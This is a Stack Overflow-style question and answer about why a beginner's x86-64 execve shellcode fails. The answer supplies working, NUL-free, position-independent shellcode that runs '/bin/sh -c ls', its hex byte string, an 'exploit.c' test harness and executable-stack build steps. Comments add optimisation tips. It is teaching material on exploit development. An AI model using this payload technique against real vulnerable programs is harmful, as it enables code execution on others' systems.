
I am new to shellcode development and I can't understand why the generated shellcode does not work as expected.

Assembler Code:

Based on an answer to my previous question.

.section .data
cmd:    .string "/bin/sh"               /* command string */
hand:   .string "-c"                    /* command arguments string */
args:   .string "ls -al"                /* arguments string */
argv:   .quad cmd                       /* array of command, command arguments and arguments */
        .quad hand
        .quad args
        .quad 0

.section .text
.globl _start
_start:
        movq    $59,            %rax    /* call execve system call */
        leaq    cmd(%rip),      %rdi    /* save command to rdi */
        leaq    argv(%rip),     %rsi    /* save args to rsi */
        movq    $0,             %rdx    /* save NULL to rdx */

        syscall                         /* make system call */

C test code:

#include<stdio.h>
#include<string.h>

unsigned char shellcode[] = "\x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\xf2\x0f\x00\x00\x48\x8d\x35\xfd\x0f\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x0f\x05";

int main()
{
    int (*ret)() = (int(*)())shellcode;
    ret();
}

Output:

Illegal instruction

Details: Kali Linux GNU/Linux i386 x86_64

    Your code has no chance of working without the data. It is likely that the syscall fails and returns with an error code, then execution continues into memory containing garbage that happens to decode as an illegal instruction. Commented Oct 18, 2020 at 17:36

1 Answer

The problem with your code is that the shellcode string you generated doesn't include any of the data. The data also contains absolute pointers, so it is not position independent and wouldn't work even if you moved it into .text and included it. When the string is run inside another program, as in your C code, it will try to find data that doesn't exist, at fixed memory locations that don't apply to the exploitable program you are running inside.

You may also have a second issue causing the Illegal instruction. You don't show how you build your C program, but I suspect it was compiled as a 32-bit program while your shellcode is 64-bit, and you can't reliably run 64-bit code in a 32-bit program. As an example, the SYSCALL instruction is an invalid opcode in a 32-bit program on non-AMD CPUs. This is just a guess in the absence of more details about how you compile/assemble/link your shellcode and your C program.
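One way to test the 32-bit guess from inside the C program itself is sketched below. The function names are made up for this example. It relies only on sizeof and on the __x86_64__ macro that GCC and Clang predefine for 64-bit x86 targets.

```c
#include <limits.h>

/* Hypothetical helper: pointer width, in bits, of the program this is
   compiled into. 32 points at a 32-bit build (for example gcc -m32),
   64 at a 64-bit build. */
int pointer_width_bits(void)
{
    return (int)(sizeof(void *) * CHAR_BIT);
}

/* Hypothetical helper: 1 when the compiler targets x86-64, 0 otherwise.
   __x86_64__ is predefined by GCC and Clang for that target. */
int built_for_x86_64(void)
{
#if defined(__x86_64__)
    return 1;
#else
    return 0;
#endif
}
```

If pointer_width_bits() reports 32 in the test program, the 64-bit shellcode is being run from a 32-bit process, which would fit the guess above.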


You will have to generate position independent code (PIC) so that it can run wherever it ends up once loaded on the stack. Your data will have to be placed inside the same segment as the code. The code also has to avoid generating the NUL character (0x00), since that would prematurely terminate the string if it were provided as user input to an actual exploitable program.
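To make the NUL problem concrete, here is a small sketch that inspects the byte string from the question. The helper names are invented for this example; the bytes are copied from the question's C test code.

```c
#include <stddef.h>
#include <string.h>

/* The shellcode string from the question, copied verbatim. */
const unsigned char question_shellcode[] =
    "\x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\xf2\x0f\x00\x00"
    "\x48\x8d\x35\xfd\x0f\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x0f\x05";

/* Length without the terminator that the compiler appends. */
const size_t question_shellcode_len = sizeof question_shellcode - 1;

/* Hypothetical helper: how many 0x00 bytes the buffer contains. */
size_t count_nul_bytes(const unsigned char *buf, size_t len)
{
    size_t count = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            count++;
    }
    return count;
}

/* Hypothetical helper: how many bytes a string function such as strcpy
   would copy before stopping at the first NUL. */
size_t bytes_before_first_nul(const unsigned char *buf)
{
    return strlen((const char *)buf);
}
```

For the question's string, bytes_before_first_nul returns 4 out of 30 bytes, and count_nul_bytes finds 11 NUL bytes, so anything that treats the payload as a C string would cut it off inside the first instruction.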

A version of your code that could be used for such purposes could look like:

shellcode.s:

# This shell code is designed to avoid any NUL(0x00) byte characters being generated
# and is coded to be position independent.

.section .text
.globl _start
_start:
    jmp overdata                 # Mix code and DATA in same segment

# Generate all the strings without a NUL(0) byte. We will replace the 0xff
# with 0x00 in the code
name:.ascii "/bin/sh"            # Program to run
name_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code
arg1:.ascii "-c"                 # Program argument
arg1_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code
arg2:.ascii "ls"                 # Program Argument
arg2_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code

overdata:
    xor  %eax, %eax              # RAX = 0

    # All references to the data before our code will use a negative offset from RIP
    # and use a 4 byte displacement. This avoids producing unwanted NUL(0) characters
    # in the code. We use RIP relative addressing so the code will be position
    # independent once loaded in memory.

    # Zero terminate each of the strings
    mov  %al, arg2_nul(%rip)     
    mov  %al, arg1_nul(%rip) 
    mov  %al, name_nul(%rip)

    lea  name(%rip), %rdi        # RDI = pointer to program name string

    push %rax                    # NULL terminate the program argument array
    leaq arg2(%rip), %rsi
    push %rsi                    # Push address of the 3rd program argument on stack
    lea  arg1(%rip), %rsi
    push %rsi                    # Push address of the 2nd program argument on stack
    push %rdi                    # Push address of the program name on stack as 1st arg
    mov  %rsp, %rsi              # RSI = Pointer to the program argument array

    mov  %rax, %rdx              # RDX = 0 = NULL envp parameter

    mov $59, %al                 # RAX = execve system call number

    syscall
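The three byte stores under "Zero terminate each of the strings" can be simulated in plain C. This is only an illustration of the idea, not part of the shellcode. The offsets and function names are assumptions made for this sketch, with offsets counted from the name label.

```c
#include <string.h>

/* Data bytes that follow the initial jmp in shellcode.s:
   name, arg1 and arg2, each ended by a 0xff placeholder. */
#define DATA_LEN 14

/* Offsets inside the data area, counted from the name label. */
enum {
    NAME_OFF     = 0,   /* "/bin/sh" */
    NAME_NUL_OFF = 7,
    ARG1_OFF     = 8,   /* "-c" */
    ARG1_NUL_OFF = 10,
    ARG2_OFF     = 11,  /* "ls" */
    ARG2_NUL_OFF = 13
};

/* Fill out[] with the data exactly as it is assembled (no NUL bytes). */
void load_data(unsigned char out[DATA_LEN])
{
    memcpy(out, "/bin/sh\xff" "-c\xff" "ls\xff", DATA_LEN);
}

/* Do what the three "mov %al, ..._nul(%rip)" instructions do at run time:
   overwrite each 0xff placeholder with 0x00. */
void patch_terminators(unsigned char data[DATA_LEN])
{
    data[ARG2_NUL_OFF] = 0x00;
    data[ARG1_NUL_OFF] = 0x00;
    data[NAME_NUL_OFF] = 0x00;
}
```

Before patch_terminators runs, the buffer contains no NUL byte at all. Afterwards the bytes at NAME_OFF, ARG1_OFF and ARG2_OFF are ordinary C strings. This is also why the shellcode needs memory that is writable as well as executable.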

You can generate a C style string with:

as --64 shellcode.s -o shellcode.o
ld shellcode.o -o shellcode
objcopy -j.text -O binary shellcode shellcode.bin
hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin

The hexdump command above would output:

\xeb\x0e\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x6c\x73\xff\x31\xc0\x88\x05\xf7\xff\xff\xff\x88\x05\xee\xff\xff\xff\x88\x05\xe5\xff\xff\xff\x48\x8d\x3d\xd7\xff\xff\xff\x50\x48\x8d\x35\xda\xff\xff\xff\x56\x48\x8d\x35\xcf\xff\xff\xff\x56\x57\x48\x89\xe6\x48\x89\xc2\xb0\x3b\x0f\x05

You will notice there are no \x00 characters, unlike in your code. You could use this string directly in a C program like:

exploit.c:

int main(void)
{
    char shellcode[]="\xeb\x0e\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x6c\x73\xff\x31\xc0\x88\x05\xf7\xff\xff\xff\x88\x05\xee\xff\xff\xff\x88\x05\xe5\xff\xff\xff\x48\x8d\x3d\xd7\xff\xff\xff\x50\x48\x8d\x35\xda\xff\xff\xff\x56\x48\x8d\x35\xcf\xff\xff\xff\x56\x57\x48\x89\xe6\x48\x89\xc2\xb0\x3b\x0f\x05";

    int (*ret)() = (int(*)())shellcode;
    ret();

    return 0;
}

This has to be compiled and linked with an executable stack:

gcc -zexecstack exploit.c -o exploit
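If an executable stack is not an option on your system, a test harness can copy the bytes into memory it maps itself. This is a different approach from the one above and is only a sketch. The function name is invented, and some hardened systems refuse mappings that are both writable and executable, in which case the function returns NULL.

```c
#define _DEFAULT_SOURCE /* for MAP_ANONYMOUS under strict -std= modes */
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: copy len bytes of code into a fresh anonymous
   mapping that is readable, writable and executable. The mapping must be
   writable because the shellcode patches its own 0xff placeholders.
   Returns NULL if the mapping cannot be created. */
void *copy_to_exec_memory(const unsigned char *code, size_t len)
{
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return NULL;
    memcpy(mem, code, len);
    return mem;
}
```

A caller would then cast the returned pointer to a function pointer, for example ((void (*)(void))mem)(), in place of the cast of the stack array in exploit.c.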

Running strace ./exploit would show an execve system call similar to:

execve("/bin/sh", ["/bin/sh", "-c", "ls"], NULL) = 0
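For comparison, the same call written in C looks roughly like the sketch below. The fork and waitpid wrapper is an addition for this example so that the calling program survives. The shellcode itself only performs the execve. The function name is invented.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run /bin/sh -c ls in a child process using the same
   execve arguments the shellcode builds (argv array, NULL envp).
   Returns the child's exit status, or -1 if fork/waitpid fails or the
   child did not exit normally. */
int run_ls_like_shellcode(void)
{
    char *const argv[] = { "/bin/sh", "-c", "ls", NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: RDI = "/bin/sh", RSI = argv, RDX = NULL in the shellcode. */
        execve("/bin/sh", argv, NULL);
        _exit(127); /* only reached if execve itself failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The argv array here plays the role of the four values the shellcode pushes on the stack: a NULL terminator, then the addresses of arg2, arg1 and name.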


Note: I would personally build the strings programmatically on the stack, similar to the code in another Stack Overflow answer I wrote.


2 Comments

You say your .s "can't be run directly", but it can if you link with --omagic to make .text writeable. Tested and works with gcc -static -nostdlib -Wl,--omagic foo.s && strace ./a.out. (Or put your code in .data and link with -zexecstack, which is actually on by default if you don't use a .note.gnu_stack directive.)
Unnecessary code-size optimizations, in case anyone's interested: You can also save 3 bytes per instruction if you do lea name(%rip), %rdi earlier, then use addressing modes like mov %al, arg2_nul-name(%rdi) and lea arg2-name(%rdi), %rsi. (RDI+disp8 instead of RIP+rel32). Setting envp=RDX=0 can be done more compactly with 1-byte cdq from the zeroed RAX, or with xor %edx,%edx. Or with mov %eax, %edx if you want. Or zero RDX in the first place instead of RAX, and set RAX=59 with 3-byte lea 59(%rdx), %eax
